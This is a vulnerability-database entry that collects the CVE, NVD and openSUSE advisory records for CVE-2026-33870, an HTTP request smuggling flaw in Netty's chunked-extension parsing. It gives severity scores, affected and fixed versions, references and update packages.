CVE-2026-33870 (GCVE-0-2026-33870)
Vulnerability from cvelistv5 – Published: 2026-03-27 19:54 – Updated: 2026-03-31 13:55
VLAI?
Title
Netty: HTTP Request Smuggling via Chunked Extension Quoted-String Parsing
Summary
Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks. Versions 4.1.132.Final and 4.2.10.Final fix the issue.
Severity ?
7.5 (High)
CWE
- CWE-444 - Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33870",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-31T13:55:28.970197Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-31T13:55:47.863Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "netty",
"vendor": "netty",
"versions": [
{
"status": "affected",
"version": "\u003c 4.1.132.Final"
},
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.10.Final"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks. Versions 4.1.132.Final and 4.2.10.Final fix the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-444",
"description": "CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-27T19:54:15.586Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8"
},
{
"name": "https://w4ke.info/2025/06/18/funky-chunks.html",
"tags": [
"x_refsource_MISC"
],
"url": "https://w4ke.info/2025/06/18/funky-chunks.html"
},
{
"name": "https://w4ke.info/2025/10/29/funky-chunks-2.html",
"tags": [
"x_refsource_MISC"
],
"url": "https://w4ke.info/2025/10/29/funky-chunks-2.html"
},
{
"name": "https://www.rfc-editor.org/rfc/rfc9110",
"tags": [
"x_refsource_MISC"
],
"url": "https://www.rfc-editor.org/rfc/rfc9110"
}
],
"source": {
"advisory": "GHSA-pwqr-wmgm-9rr8",
"discovery": "UNKNOWN"
},
"title": "Netty: HTTP Request Smuggling via Chunked Extension Quoted-String Parsing"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33870",
"datePublished": "2026-03-27T19:54:15.586Z",
"dateReserved": "2026-03-24T15:10:05.678Z",
"dateUpdated": "2026-03-31T13:55:47.863Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-33870\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-27T20:16:34.663\",\"lastModified\":\"2026-03-30T20:12:16.330\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks. Versions 4.1.132.Final and 4.2.10.Final fix the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-444\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.1.132\",\"matchCriteriaId\":\"8F551B7E-5E29-4062-8FDB-AA1377B3E8F5\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"4.2.0\",\"versionEndExcluding\":\"4.2.10\",\"matchCriteriaId\":\"419E92FA-6271-4613-AF3D-CF09ADFF2E13\"}]}]}],\"references\":[{\"url\":\"https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://w4ke.info/2025/06/18/funky-chunks.html\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Technical Description\"]},{\"url\":\"https://w4ke.info/2025/10/29/funky-chunks-2.html\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Technical Description\"]},{\"url\":\"https://www.rfc-editor.org/rfc/rfc9110\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Technical Description\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33870\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-31T13:55:28.970197Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-31T13:55:43.820Z\"}}], \"cna\": {\"title\": \"Netty: HTTP Request Smuggling via Chunked Extension Quoted-String Parsing\", \"source\": {\"advisory\": \"GHSA-pwqr-wmgm-9rr8\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"netty\", \"product\": \"netty\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.1.132.Final\"}, {\"status\": \"affected\", \"version\": \"\u003e= 4.2.0.Alpha1, \u003c 4.2.10.Final\"}]}], \"references\": [{\"url\": \"https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8\", \"name\": \"https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://w4ke.info/2025/06/18/funky-chunks.html\", \"name\": \"https://w4ke.info/2025/06/18/funky-chunks.html\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://w4ke.info/2025/10/29/funky-chunks-2.html\", \"name\": \"https://w4ke.info/2025/10/29/funky-chunks-2.html\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://www.rfc-editor.org/rfc/rfc9110\", \"name\": \"https://www.rfc-editor.org/rfc/rfc9110\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks. Versions 4.1.132.Final and 4.2.10.Final fix the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-444\", \"description\": \"CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-27T19:54:15.586Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-33870\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-31T13:55:47.863Z\", \"dateReserved\": \"2026-03-24T15:10:05.678Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-27T19:54:15.586Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-33870
Vulnerability from fkie_nvd - Published: 2026-03-27 20:16 - Updated: 2026-03-30 20:12
Severity ?
Summary
Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks. Versions 4.1.132.Final and 4.2.10.Final fix the issue.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8 | Exploit, Mitigation, Vendor Advisory | |
| security-advisories@github.com | https://w4ke.info/2025/06/18/funky-chunks.html | Technical Description | |
| security-advisories@github.com | https://w4ke.info/2025/10/29/funky-chunks-2.html | Technical Description | |
| security-advisories@github.com | https://www.rfc-editor.org/rfc/rfc9110 | Technical Description |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8F551B7E-5E29-4062-8FDB-AA1377B3E8F5",
"versionEndExcluding": "4.1.132",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "419E92FA-6271-4613-AF3D-CF09ADFF2E13",
"versionEndExcluding": "4.2.10",
"versionStartIncluding": "4.2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks. Versions 4.1.132.Final and 4.2.10.Final fix the issue."
}
],
"id": "CVE-2026-33870",
"lastModified": "2026-03-30T20:12:16.330",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-27T20:16:34.663",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-pwqr-wmgm-9rr8"
},
{
"source": "security-advisories@github.com",
"tags": [
"Technical Description"
],
"url": "https://w4ke.info/2025/06/18/funky-chunks.html"
},
{
"source": "security-advisories@github.com",
"tags": [
"Technical Description"
],
"url": "https://w4ke.info/2025/10/29/funky-chunks-2.html"
},
{
"source": "security-advisories@github.com",
"tags": [
"Technical Description"
],
"url": "https://www.rfc-editor.org/rfc/rfc9110"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-444"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
OPENSUSE-SU-2026:10463-1
Vulnerability from csaf_opensuse - Published: 2026-03-30 00:00 - Updated: 2026-03-30 00:00Summary
netty-4.1.132-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: netty-4.1.132-1.1 on GA media
Description of the patch: These are all security issues fixed in the netty-4.1.132-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-10463
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "netty-4.1.132-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the netty-4.1.132-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2026-10463",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_10463-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-33870 page",
"url": "https://www.suse.com/security/cve/CVE-2026-33870/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-33871 page",
"url": "https://www.suse.com/security/cve/CVE-2026-33871/"
}
],
"title": "netty-4.1.132-1.1 on GA media",
"tracking": {
"current_release_date": "2026-03-30T00:00:00Z",
"generator": {
"date": "2026-03-30T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:10463-1",
"initial_release_date": "2026-03-30T00:00:00Z",
"revision_history": [
{
"date": "2026-03-30T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.132-1.1.aarch64",
"product": {
"name": "netty-4.1.132-1.1.aarch64",
"product_id": "netty-4.1.132-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.132-1.1.aarch64",
"product": {
"name": "netty-bom-4.1.132-1.1.aarch64",
"product_id": "netty-bom-4.1.132-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.132-1.1.aarch64",
"product": {
"name": "netty-javadoc-4.1.132-1.1.aarch64",
"product_id": "netty-javadoc-4.1.132-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.132-1.1.aarch64",
"product": {
"name": "netty-parent-4.1.132-1.1.aarch64",
"product_id": "netty-parent-4.1.132-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.132-1.1.ppc64le",
"product": {
"name": "netty-4.1.132-1.1.ppc64le",
"product_id": "netty-4.1.132-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.132-1.1.ppc64le",
"product": {
"name": "netty-bom-4.1.132-1.1.ppc64le",
"product_id": "netty-bom-4.1.132-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.132-1.1.ppc64le",
"product": {
"name": "netty-javadoc-4.1.132-1.1.ppc64le",
"product_id": "netty-javadoc-4.1.132-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.132-1.1.ppc64le",
"product": {
"name": "netty-parent-4.1.132-1.1.ppc64le",
"product_id": "netty-parent-4.1.132-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.132-1.1.s390x",
"product": {
"name": "netty-4.1.132-1.1.s390x",
"product_id": "netty-4.1.132-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.132-1.1.s390x",
"product": {
"name": "netty-bom-4.1.132-1.1.s390x",
"product_id": "netty-bom-4.1.132-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.132-1.1.s390x",
"product": {
"name": "netty-javadoc-4.1.132-1.1.s390x",
"product_id": "netty-javadoc-4.1.132-1.1.s390x"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.132-1.1.s390x",
"product": {
"name": "netty-parent-4.1.132-1.1.s390x",
"product_id": "netty-parent-4.1.132-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "netty-4.1.132-1.1.x86_64",
"product": {
"name": "netty-4.1.132-1.1.x86_64",
"product_id": "netty-4.1.132-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-bom-4.1.132-1.1.x86_64",
"product": {
"name": "netty-bom-4.1.132-1.1.x86_64",
"product_id": "netty-bom-4.1.132-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-javadoc-4.1.132-1.1.x86_64",
"product": {
"name": "netty-javadoc-4.1.132-1.1.x86_64",
"product_id": "netty-javadoc-4.1.132-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "netty-parent-4.1.132-1.1.x86_64",
"product": {
"name": "netty-parent-4.1.132-1.1.x86_64",
"product_id": "netty-parent-4.1.132-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.132-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.132-1.1.aarch64"
},
"product_reference": "netty-4.1.132-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.132-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.132-1.1.ppc64le"
},
"product_reference": "netty-4.1.132-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.132-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.132-1.1.s390x"
},
"product_reference": "netty-4.1.132-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-4.1.132-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-4.1.132-1.1.x86_64"
},
"product_reference": "netty-4.1.132-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.132-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.132-1.1.aarch64"
},
"product_reference": "netty-bom-4.1.132-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.132-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.132-1.1.ppc64le"
},
"product_reference": "netty-bom-4.1.132-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.132-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.132-1.1.s390x"
},
"product_reference": "netty-bom-4.1.132-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.132-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.132-1.1.x86_64"
},
"product_reference": "netty-bom-4.1.132-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.132-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.aarch64"
},
"product_reference": "netty-javadoc-4.1.132-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.132-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.ppc64le"
},
"product_reference": "netty-javadoc-4.1.132-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.132-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.s390x"
},
"product_reference": "netty-javadoc-4.1.132-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.132-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.x86_64"
},
"product_reference": "netty-javadoc-4.1.132-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.132-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.132-1.1.aarch64"
},
"product_reference": "netty-parent-4.1.132-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.132-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.132-1.1.ppc64le"
},
"product_reference": "netty-parent-4.1.132-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.132-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.132-1.1.s390x"
},
"product_reference": "netty-parent-4.1.132-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.132-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.132-1.1.x86_64"
},
"product_reference": "netty-parent-4.1.132-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-33870",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-33870"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks. Versions 4.1.132.Final and 4.2.10.Final fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-33870",
"url": "https://www.suse.com/security/cve/CVE-2026-33870"
},
{
"category": "external",
"summary": "SUSE Bug 1261031 for CVE-2026-33870",
"url": "https://bugzilla.suse.com/1261031"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.132-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.132-1.1.ppc64le",
